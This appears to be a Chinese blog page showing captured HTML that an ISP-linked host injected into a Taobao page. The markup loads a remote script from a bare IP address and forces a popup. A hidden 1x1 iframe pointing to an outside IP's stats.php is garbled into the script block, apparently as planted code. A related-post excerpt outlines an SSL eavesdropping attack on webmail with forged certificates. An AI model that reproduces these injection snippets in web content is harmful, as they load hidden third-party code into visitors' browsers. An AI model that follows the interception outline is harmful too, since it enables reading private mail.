<html>

<head>

<meta http-equiv=’pragma’ content=’no-cache’/>

<meta http-equiv=’expires’ content=’-1′/>

<script>

window.setInterval(‘window.status=location.href’, 200);

</script>

</head>

<body scroll=’no’ style=’border:0; margin:0; padding:0;’ id=’mainbody’>

<iframe src=’about:blank’ width=’100%’ height=’100%’ frameborder=’0′></iframe>

<script language=’JavaScript’ src=’http://121.10.130.24:1010/open.js’></script>

<script language=’JavaScript’>

var content=’http://welcome.gd.vnet.cn/ztts/happytv%5Fnb/?p=1240568245|11215897|388|448|0|0&param=ABioyajZGekprChZWXkIu/zsnM0Zib2Y+Qk5achpabwszHx9mKjJqNkZ6Sms3ChZWXkIu/zsnM0Zib2ZyWi4aWm8LP2YyQio2cmoqNk8KLjZ6bmtGLnpCdnpDRnJCS0IuNnpua0JaLmpKTloyL0JOWjIugjJCTm6CWi5qSjNGXi5I=’;

<!– Web Stats –> <iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!– End Web Stats –>

var old_url=’http://trade.taobao.com/trade/itemlist/list_sold_items.htm?’;

var param=’350|250|9′;

var stat_path = ‘http://121.10.130.13/stat.aspx?p=1240568245|11215897|388|448|0|0′;

try{OpenWin();}catch(e){location.reload(true);}

</script>

</body>

</html>

Related posts:

1. SSL窃听攻击实操 OK，我恶毒的心灵又开始蠢蠢欲动了。今天带给大家的是SSL窃听攻击从理论到实际操作的成功例子 SSL窃听最主要的是你要有一张合法的SSL证书，并且证书名称必须和被攻击的网站域名一致。目前各大CA都有很低廉价格的SSL证书申请，最低的价格只需要10美元不到，甚至还有一些域名注册商大批量采购这些证书，并且在你注册域名的时候免费送你一张。 对于低廉价格的域名SSL证书，CA签发的前提只有一个：只要你有申请的域名某几个特定的邮箱，并且在CA给这个邮箱发送一封确认邮件的时候approve就可以了。 所以，问题的关键是如何截获到这封确认邮件。但我相信某些机构是有办法能做到这一点的。 当然，还有更加简单的办法：国内不少软件在安装的时候，都会偷偷摸摸的把自己的root CA装到用户电脑里面去。Windows的安全机制让这个导入root CA的操作根本没有任何的确认信息和提示。甚至微软还提供了一个专用的小程序用于导入证书。只要你找到这些软件厂商，就可以任意生成证书，并且这些证书都是有效的，不会出现警告。 废话不多说了，开始干活。这里sohu的vip邮箱为例（他们能在整个使用过程中支持ssl），先生成一张vip.sohu.com的key和csr Sam@Bra:~$ mkdir...
2. 看看卡巴斯基能坚持到什么时候 相信最近一个多月中，机器装了卡巴斯基的朋友访问我的blog的时候，一定会出现一个网页有毒的警报。而有毒的文件则是favicon.ico。其实我的网站之前是没有这个文件的，是WordPress输出了一个404，然后后面带上了不少js内容，但卡巴就没有判断网页其实已经是404，就这样以为是带毒了。 事情已经过去有快2个月了，到今天为止还是有不少人跟我说我的blog被挂马。我很好奇，对于这个误报的情况，卡巴还能坚持多久？...

Related posts brought to you by Yet Another Related Posts Plugin.